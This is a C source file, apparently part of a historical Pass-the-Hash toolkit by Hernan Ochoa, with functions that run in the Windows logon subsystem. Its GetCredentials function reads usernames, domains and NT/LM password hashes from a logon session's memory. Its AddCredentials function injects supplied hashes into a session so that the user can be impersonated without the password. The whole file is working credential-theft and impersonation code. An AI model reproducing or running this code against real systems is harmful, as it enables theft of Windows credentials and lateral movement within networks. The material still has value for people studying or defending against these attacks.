// $Id: pth.c,v 1.6 2008/02/25 17:40:13 hochoa Exp $

/*
 *  
 *
 * Description: pth.c
 *
 * Author: Hernan Ochoa (hochoa@coresecurity.com) (hernan@gmail.com)
 *
 * Copyright (c) 2007-2008 Hernan Ochoa, Buenos Aires, Argentina.
 * All rights reserved.
 *
 *
 * THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESS OR IMPLIED
WARRANTIES
 * ARE DISCLAIMED. IN NO EVENT SHALL CORE SDI S.A. BE LIABLE FOR ANY
DIRECT,
 * INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY OR CONSEQUENTIAL DAMAGES
 * RESULTING FROM THE USE OR MISUSE OF ANY RECOMPILATION OF THIS SOURCE
 * CODE NOT PROVIDED BY CORE SDI S.A.
 **/


#include <windows.h>
#include <ntsecapi.h>
#include <stdio.h>
#include "pth.h"

// YES, I could be using the already defined data types, but it's the same :)
#pragma pack(1)
typedef struct {
	
	WORD Length;
        WORD MaxLength;
        DWORD  Buffer;
	
} UNICODE_STR;

// I'm hardcoding the maximum size of the username and domain.
typedef struct {

    UNICODE_STR ustr_domain;
    UNICODE_STR ustr_username;
    BYTE NThash[16];
    BYTE LMhash[16];
    BYTE Udomain[MAX_DOMAIN_LEN];
    BYTE Uuser[MAX_USERNAME_LEN];
	
} CREDSBLOCK;


void debugtofile(char *s)
{
FILE *fp;

	fp = fopen("c:\\debug.txt", "ab");
	fprintf(fp, "%s\n", s);
	fclose(fp);
	
}

// Typedef for Ptr to MSV1_0.DLL 'NlpGetPrimaryCredential' internal function
typedef unsigned int  (__stdcall*pNlpGetPrimaryCredentialFunc)(PLUID pluid, DWORD* ptrtoCreds, DWORD whatever);

// Typedef for Ptr to MSV1_0.DLL 'NlpAddPrimaryCredential' internal function
typedef unsigned int  (__stdcall*pNlpAddPrimaryCredentialFunc)(PLUID pluid, BYTE* ptrtoCreds, DWORD dwCredsSize);

BOOL CopyUnicodeToAnsi(  char* outbuffer, unsigned int outbuffer_len, char* unicode_str, unsigned int unicode_len)
{
unsigned int n, j;
char* pData;
	if ( unicode_str == NULL || unicode_len == 0 || outbuffer == NULL || outbuffer_len == 0 ) return FALSE;
	
	// hehe
	if ( unicode_len > outbuffer_len ) return FALSE;
	
	memset(outbuffer, '\0', outbuffer_len);
	n = 0;
	j = 0;

	pData = unicode_str;
	for( n=0; n < outbuffer_len; n++, j+=2)
	{
			
		if( pData[j] == '\x00') {
				outbuffer[n] = '\x00';
				break;
		}
			
		if( pData[j] != '\x00' ) {
				
			outbuffer[n] = pData[j];
		}
	}
	outbuffer[outbuffer_len-1]='\x00';
	return TRUE;
}


void __declspec(dllexport) AddCredentials(PTHPARAMS* pPTHparams)
{
BOOL bRet;
DWORD dwNlpGetPrimaryCredential, dwNlpAddPrimaryCredential, dwNlpDeletePrimaryCredential;
DWORD pPtrToCreds;
pNlpAddPrimaryCredentialFunc addCreds;
char buffer[1024];
unsigned int uUsernameLen, uDomainLen, n, j, uCredsBlockSize;
CREDSBLOCK credsBlock;


//	_asm int 3
	if( pPTHparams == NULL) return;
	
	// Try to find the addresses of the functions we need
	bRet = FindMSV10Functions( &dwNlpGetPrimaryCredential,
			&dwNlpAddPrimaryCredential,
			&dwNlpDeletePrimaryCredential);
	
	if( bRet == FALSE ) {

		//debugtofile("findfailed");	
		pPTHparams->bRet = FALSE;
		return;
	}
	
	pPTHparams->dwNlpGetPrimaryCredential = dwNlpGetPrimaryCredential;
	pPTHparams->dwNlpAddPrimaryCredential = dwNlpAddPrimaryCredential;
	pPTHparams->dwNlpDeletePrimaryCredential = dwNlpDeletePrimaryCredential;
	
	addCreds = (pNlpAddPrimaryCredentialFunc)dwNlpAddPrimaryCredential;
	
	
	uUsernameLen = strlen(pPTHparams->username);
	uDomainLen = strlen(pPTHparams->domainname);
	if( uUsernameLen < 1 || uDomainLen < 1 )
	{
		pPTHparams->bRet = FALSE;
		return;
		
	}
	// Calculate size of CredsBlock
	// CredsBlock = 
	//      size_of_domain         4
	//      PTR TO DOMAIN          4
	//      size_of_username       4  
	//      PTR TO USERNAME        4
	//      NTM HASH               16
	//      LM HASH                16
	//      DOMAIN_UNICODE         (len(domain)+1)*2
	//      USER_UNICODE           (len(user)+1)*2
	
	uCredsBlockSize = sizeof(UNICODE_STR)*2+32+MAX_DOMAIN_LEN+MAX_USERNAME_LEN;
	
	credsBlock.ustr_domain.Length = (uDomainLen)*2;
//	credsBlock.ustr_domain.MaxLength = (uDomainLen+1)*2;
	credsBlock.ustr_domain.MaxLength = MAX_DOMAIN_LEN;
	credsBlock.ustr_username.Length = (uUsernameLen)*2;
//	credsBlock.ustr_username.MaxLength = (uUsernameLen+1)*2;
	credsBlock.ustr_username.MaxLength = MAX_USERNAME_LEN;
	
	
        
	memset( credsBlock.Udomain, '\x00', MAX_DOMAIN_LEN);
	memset( credsBlock.Uuser, '\x00', MAX_USERNAME_LEN);
	
        if( ( ((uUsernameLen+1)*2) < MAX_USERNAME_LEN ) && ( ((uDomainLen+1)*2) < MAX_DOMAIN_LEN ) ) {
		
		for(n=0, j=0; n<((uUsernameLen)*2); n+=2, j++)
		{
			credsBlock.Uuser[n] = pPTHparams->username[j];
			credsBlock.Uuser[n+1] = '\x00';
                }
                
                for(n=0, j=0; n<((uDomainLen)*2); n+=2, j++)
                {
                        credsBlock.Udomain[n] = pPTHparams->domainname[j];
			credsBlock.Udomain[n+1] = '\x00';
		}
		
		// just because I feel like it
		credsBlock.Uuser[MAX_USERNAME_LEN-1] = '\x00';
		credsBlock.Uuser[MAX_USERNAME_LEN-2] = '\x00';
		credsBlock.Udomain[MAX_DOMAIN_LEN-1] = '\x00';
		credsBlock.Udomain[MAX_DOMAIN_LEN-2] = '\x00';
		
	}
	else
	{
		pPTHparams->bRet = FALSE;
		return;
	
	}
	
	memcpy( credsBlock.NThash, pPTHparams->NThash, 16);
	memcpy( credsBlock.LMhash, pPTHparams->LMhash, 16);


	// set ptrs to domain and username
	credsBlock.ustr_domain.Buffer = ((DWORD)&credsBlock)+(sizeof(UNICODE_STR)*2)+32;
	credsBlock.ustr_username.Buffer = ((DWORD)&credsBlock)+(sizeof(UNICODE_STR)*2)+32+MAX_DOMAIN_LEN;

	// add credentials!
	bRet = addCreds( &pPTHparams->LogonID, (BYTE*)&credsBlock, uCredsBlockSize);

	if( bRet == TRUE) {
		
		//debugtofile("add failed");
		pPTHparams->bRet = FALSE;
		return;
	}

	pPTHparams->bRet = TRUE;
	return;

}

void __declspec(dllexport) GetCredentials(PTHPARAMS* pPTHparams)
{
BOOL bRet;
DWORD dwNlpGetPrimaryCredential, dwNlpAddPrimaryCredential, dwNlpDeletePrimaryCredential;
DWORD pPtrToCreds;
pNlpGetPrimaryCredentialFunc getCreds;
char buffer[1024];
unsigned int wLen;
BYTE *pTEMP;


	if( pPTHparams == NULL) return;
	
	// Try to find the addresses of the functions we need
	bRet = FindMSV10Functions( &dwNlpGetPrimaryCredential,
			&dwNlpAddPrimaryCredential,
			&dwNlpDeletePrimaryCredential);
	
	if( bRet == FALSE ) {

		//debugtofile("findfailed");	
		pPTHparams->bRet = FALSE;
		return;
	}
	
	pPTHparams->dwNlpGetPrimaryCredential = dwNlpGetPrimaryCredential;
	pPTHparams->dwNlpAddPrimaryCredential = dwNlpAddPrimaryCredential;
	pPTHparams->dwNlpDeletePrimaryCredential = dwNlpDeletePrimaryCredential;

	
	getCreds = (pNlpGetPrimaryCredentialFunc)dwNlpGetPrimaryCredential;
	

	bRet = getCreds( &pPTHparams->LogonID, &pPtrToCreds, 0);
	
	
	if( bRet == TRUE) {
		
		//debugtofile("get failed");
		pPTHparams->bRet = FALSE;
		return;
	}

	
	// Get Size of Domain
	wLen = (*((WORD*)pPtrToCreds))/2;
	// Get Ptr to Domain Unicode String
	pTEMP = (BYTE*)(*(DWORD*)(pPtrToCreds+4));
	bRet = CopyUnicodeToAnsi( buffer, sizeof(buffer), pTEMP, wLen );
	
	if( bRet == FALSE ) {
		//debugtofile("copytounicode failed");
		pPTHparams->bRet = FALSE;
		return;
	}

	// Copy to out structure
	memcpy( pPTHparams->domainname, buffer, 1024 );
	
	// get Size of username
	wLen = (*((WORD*)(pPtrToCreds+4+4)))/2;
	// Get Ptr to username Unicode String
	pTEMP = (BYTE*)(*(DWORD*)(pPtrToCreds+4+4+4));
	
	bRet = CopyUnicodeToAnsi( buffer, sizeof(buffer), pTEMP, wLen );
	
	if( bRet == FALSE ) {
		//debugtofile("copytounicode failed");
		pPTHparams->bRet = FALSE;
		return;
	}

	// Copy to out structure
	memcpy( pPTHparams->username, buffer, 1024 );

	// Get Ptr to NT
	pTEMP = (BYTE*)(pPtrToCreds+0x10);
	// copy to out structure
	memcpy ( pPTHparams->NThash, pTEMP, 16);
	
	// Get Ptr to LM
	pTEMP = (BYTE*)(pPtrToCreds+0x20);
	// copy to out structure
	memcpy ( pPTHparams->LMhash, pTEMP, 16);
	
	pPTHparams->bRet = TRUE;
	return;

}
